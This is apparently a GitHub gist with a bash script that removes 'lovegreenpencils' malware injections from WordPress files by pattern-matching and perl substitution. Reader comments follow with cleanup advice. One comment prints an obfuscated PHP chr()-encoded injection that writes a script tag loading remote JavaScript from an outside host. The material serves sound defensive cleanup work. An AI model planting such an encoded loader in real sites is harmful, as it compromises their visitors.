-
-
Save black-dragon74/86fc18a91e814019228c02531f0ea01c to your computer and use it in GitHub Desktop.
#!/bin/bash | |
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" | |
totalInfections=0 | |
filesProcessed=0 | |
echo "Welcome to lovegreenpencils malware fixer by black-dragon74" | |
echo "This fix is divided into 3 phases." | |
echo "Phase 1 fixes the \`beckup\` files." | |
echo "Phase 2 fixes the header injections." | |
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections" | |
echo | |
# Begin phase 1 | |
read -p "Press any key to begin the phase 1: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 1 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 2 | |
read -p "Press any key to begin the phase 2: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 2 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 3 | |
read -p "Press any key to begin the phase 3: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "lovegreenpencils" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 3 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Processing complete. | |
echo | |
echo "Found, backed up and fixed $totalInfections infected files." | |
read -p "Processing complete. Press any key to exit. " yay | |
exit 0 | |
I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>
Usually, the hacker infect large amount of file. Beware and launch the grep command on root directory.
Check if you haven't file call "lte_" or something on the root then check if you haven't got any maintenance.php or maintenance folder or wp-sheeep on plugin folder also check if you don"t have wp-stream.php file on root as well.
The best thing I thinks once the cleaning done, its to export DB, Export uploads/ themes/ plugins/ and reinstall fresh WP.